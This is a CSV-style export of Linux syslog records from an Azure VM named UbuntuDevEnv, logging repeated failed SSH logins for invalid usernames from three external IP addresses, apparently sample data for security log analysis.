+15586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:46,UbuntuDevEnv,2019-06-26 06:22:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,28469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:48,UbuntuDevEnv,2019-06-26 06:22:47,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.59.69.138 port 52026 ssh2,28469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.59.69.1,52026,,
+15588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:48,UbuntuDevEnv,2019-06-26 06:22:48,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 45.59.69.138 port 52026 [preauth],28469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.59.69.1,52026,,
+15589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:48,UbuntuDevEnv,2019-06-26 06:22:48,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 52026:11: Bye Bye [preauth],28469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,52026,,
+15590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:52,UbuntuDevEnv,2019-06-26 06:25:52,auth,UbuntuDevEnv,info,Invalid user jake from 45.59.69.138 port 58932,29314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jake,45.59.69.1,58932,,
+15591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:52,UbuntuDevEnv,2019-06-26 06:25:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:52,UbuntuDevEnv,2019-06-26 06:25:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,29314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:55,UbuntuDevEnv,2019-06-26 06:25:55,auth,UbuntuDevEnv,info,Failed password for invalid user jake from 45.59.69.138 port 58932 ssh2,29314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jake,45.59.69.1,58932,,
+15594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:55,UbuntuDevEnv,2019-06-26 06:25:55,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 58932:11: Bye Bye [preauth],29314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,58932,,
+15595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:55,UbuntuDevEnv,2019-06-26 06:25:55,auth,UbuntuDevEnv,info,Disconnected from invalid user jake 45.59.69.138 port 58932 [preauth],29314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jake,45.59.69.1,58932,,
+15596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:57,UbuntuDevEnv,2019-06-26 06:25:57,auth,UbuntuDevEnv,info,Invalid user signature from 106.12.27.140 port 45703,29414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,signature,106.12.27.1,45703,,
+15597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:57,UbuntuDevEnv,2019-06-26 06:25:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:57,UbuntuDevEnv,2019-06-26 06:25:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,29414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:59,UbuntuDevEnv,2019-06-26 06:25:59,auth,UbuntuDevEnv,info,Failed password for invalid user signature from 106.12.27.140 port 45703 ssh2,29414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,signature,106.12.27.1,45703,,
+15600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:00,UbuntuDevEnv,2019-06-26 06:25:59,auth,UbuntuDevEnv,info,Disconnected from invalid user signature 106.12.27.140 port 45703 [preauth],29414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,signature,106.12.27.1,45703,,
+15601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:00,UbuntuDevEnv,2019-06-26 06:25:59,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 45703:11: Bye Bye [preauth],29414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,45703,,
+15602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:47,UbuntuDevEnv,2019-06-26 06:26:46,auth,UbuntuDevEnv,info,Invalid user oracle5 from 139.99.98.248 port 50302,29588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,139.99.98.2,50302,,
+15603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:47,UbuntuDevEnv,2019-06-26 06:26:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:47,UbuntuDevEnv,2019-06-26 06:26:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,29588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:49,UbuntuDevEnv,2019-06-26 06:26:48,auth,UbuntuDevEnv,info,Failed password for invalid user oracle5 from 139.99.98.248 port 50302 ssh2,29588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,139.99.98.2,50302,,
+15606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:49,UbuntuDevEnv,2019-06-26 06:26:48,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle5 139.99.98.248 port 50302 [preauth],29588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,139.99.98.2,50302,,
+15607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:26:49,UbuntuDevEnv,2019-06-26 06:26:48,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 50302:11: Bye Bye [preauth],29588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,50302,,
+15608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:08,UbuntuDevEnv,2019-06-26 06:27:07,auth,UbuntuDevEnv,info,Invalid user install from 106.12.27.140 port 53675,29667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,install,106.12.27.1,53675,,
+15609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:08,UbuntuDevEnv,2019-06-26 06:27:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:08,UbuntuDevEnv,2019-06-26 06:27:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,29667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:10,UbuntuDevEnv,2019-06-26 06:27:09,auth,UbuntuDevEnv,info,Failed password for invalid user install from 106.12.27.140 port 53675 ssh2,29667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,install,106.12.27.1,53675,,
+15612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:10,UbuntuDevEnv,2019-06-26 06:27:09,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 53675:11: Bye Bye [preauth],29667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,53675,,
+15613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:10,UbuntuDevEnv,2019-06-26 06:27:09,auth,UbuntuDevEnv,info,Disconnected from invalid user install 106.12.27.140 port 53675 [preauth],29667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,install,106.12.27.1,53675,,
+15614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:24,UbuntuDevEnv,2019-06-26 06:27:23,auth,UbuntuDevEnv,info,Invalid user rachel from 45.59.69.138 port 48266,29728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,45.59.69.1,48266,,
+15615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:24,UbuntuDevEnv,2019-06-26 06:27:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,29728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:24,UbuntuDevEnv,2019-06-26 06:27:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:25,UbuntuDevEnv,2019-06-26 06:27:24,auth,UbuntuDevEnv,info,Failed password for invalid user rachel from 45.59.69.138 port 48266 ssh2,29728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,45.59.69.1,48266,,
+15618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:25,UbuntuDevEnv,2019-06-26 06:27:24,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 48266:11: Bye Bye [preauth],29728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,48266,,
+15619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:27:25,UbuntuDevEnv,2019-06-26 06:27:24,auth,UbuntuDevEnv,info,Disconnected from invalid user rachel 45.59.69.138 port 48266 [preauth],29728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,45.59.69.1,48266,,
+15620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:23,UbuntuDevEnv,2019-06-26 06:28:22,auth,UbuntuDevEnv,info,Invalid user myron from 106.12.27.140 port 61651,29930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myron,106.12.27.1,61651,,
+15621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:23,UbuntuDevEnv,2019-06-26 06:28:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:23,UbuntuDevEnv,2019-06-26 06:28:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,29930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:25,UbuntuDevEnv,2019-06-26 06:28:24,auth,UbuntuDevEnv,info,Failed password for invalid user myron from 106.12.27.140 port 61651 ssh2,29930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myron,106.12.27.1,61651,,
+15624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:25,UbuntuDevEnv,2019-06-26 06:28:25,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 61651:11: Bye Bye [preauth],29930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,61651,,
+15625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:25,UbuntuDevEnv,2019-06-26 06:28:25,auth,UbuntuDevEnv,info,Disconnected from invalid user myron 106.12.27.140 port 61651 [preauth],29930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myron,106.12.27.1,61651,,
+15626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:30,UbuntuDevEnv,2019-06-26 06:28:29,auth,UbuntuDevEnv,info,Invalid user socrate from 139.99.98.248 port 39214,29957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,139.99.98.2,39214,,
+15627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:30,UbuntuDevEnv,2019-06-26 06:28:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,29957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:30,UbuntuDevEnv,2019-06-26 06:28:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:32,UbuntuDevEnv,2019-06-26 06:28:31,auth,UbuntuDevEnv,info,Failed password for invalid user socrate from 139.99.98.248 port 39214 ssh2,29957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,139.99.98.2,39214,,
+15630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:32,UbuntuDevEnv,2019-06-26 06:28:31,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 39214:11: Bye Bye [preauth],29957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,39214,,
+15631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:32,UbuntuDevEnv,2019-06-26 06:28:31,auth,UbuntuDevEnv,info,Disconnected from invalid user socrate 139.99.98.248 port 39214 [preauth],29957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,139.99.98.2,39214,,
+15632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:54,UbuntuDevEnv,2019-06-26 06:28:54,auth,UbuntuDevEnv,info,Invalid user dashboard from 45.59.69.138 port 37604,30041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dashboard,45.59.69.1,37604,,
+15633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:54,UbuntuDevEnv,2019-06-26 06:28:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:54,UbuntuDevEnv,2019-06-26 06:28:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,30041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:56,UbuntuDevEnv,2019-06-26 06:28:56,auth,UbuntuDevEnv,info,Failed password for invalid user dashboard from 45.59.69.138 port 37604 ssh2,30041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dashboard,45.59.69.1,37604,,
+15636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:56,UbuntuDevEnv,2019-06-26 06:28:56,auth,UbuntuDevEnv,info,Disconnected from invalid user dashboard 45.59.69.138 port 37604 [preauth],30041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dashboard,45.59.69.1,37604,,
+15637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:28:56,UbuntuDevEnv,2019-06-26 06:28:56,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 37604:11: Bye Bye [preauth],30041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,37604,,
+15638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:29:34,UbuntuDevEnv,2019-06-26 06:29:34,auth,UbuntuDevEnv,info,Invalid user jesus from 106.12.27.140 port 14628,30180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,106.12.27.1,14628,,
+15639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:29:34,UbuntuDevEnv,2019-06-26 06:29:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:29:34,UbuntuDevEnv,2019-06-26 06:29:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,30180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:29:37,UbuntuDevEnv,2019-06-26 06:29:36,auth,UbuntuDevEnv,info,Failed password for invalid user jesus from 106.12.27.140 port 14628 ssh2,30180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,106.12.27.1,14628,,
+15642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:29:37,UbuntuDevEnv,2019-06-26 06:29:37,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 14628:11: Bye Bye [preauth],30180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,14628,,
+15643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:29:37,UbuntuDevEnv,2019-06-26 06:29:37,auth,UbuntuDevEnv,info,Disconnected from invalid user jesus 106.12.27.140 port 14628 [preauth],30180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesus,106.12.27.1,14628,,
+15644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:13,UbuntuDevEnv,2019-06-26 06:30:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,30349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:13,UbuntuDevEnv,2019-06-26 06:30:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
